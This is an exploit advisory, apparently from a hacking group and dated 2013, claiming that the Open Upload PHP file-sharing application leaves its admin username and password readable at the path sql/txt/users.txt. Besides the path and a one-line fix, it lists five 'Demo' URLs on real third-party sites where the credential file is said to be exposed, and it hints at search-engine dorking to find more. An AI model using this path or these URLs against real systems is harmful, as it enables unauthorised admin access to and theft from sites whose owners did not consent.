facebook facebook twitter rss

Open Upload v0.X Remote Password Disclosure Vulnerablity

Author: TUNISIAN CYBER , Published: 21-12-2013
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Open Upload v0.X Remote Password Disclosure Vulnerablity
[+] Date: 21-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/openupload/files/openupload/
[+] Google Dork: USE YOUR MIND
[+] Tested on: Win7
[+] Friend's blog: http://na3il.wordpress.com/

########################################################################################
+Description:
Open Upload is an open source extensible PHP application for fast file upload and download for big
(and small) file sharing, like rapidshare and megaupload.
Multiple authentication methods, database backends, multilanguage support.

+Exploit:
The Uploaders suffers from a Remote Password Disclosure Vulnerablity which allows the attacker to get admin username
and password.

127.0.0.1/[PATH]/sql/txt/users.txt

+Fix:
Change users.txt's name

Demo:
http://78.236.57.171/sql/txt/users.txt
http://peres-eckey.de/openupload/sql/txt/users.txt
http://openupload.cantal.chambagri.fr/sql/txt/users.txt
http://www.cupload.org/sites/cupload/sql/txt/users.txt
http://berretin.batz.com/openupload/sql/txt/users.txt
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt, 5obzMtbga
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

Like us on Facebook :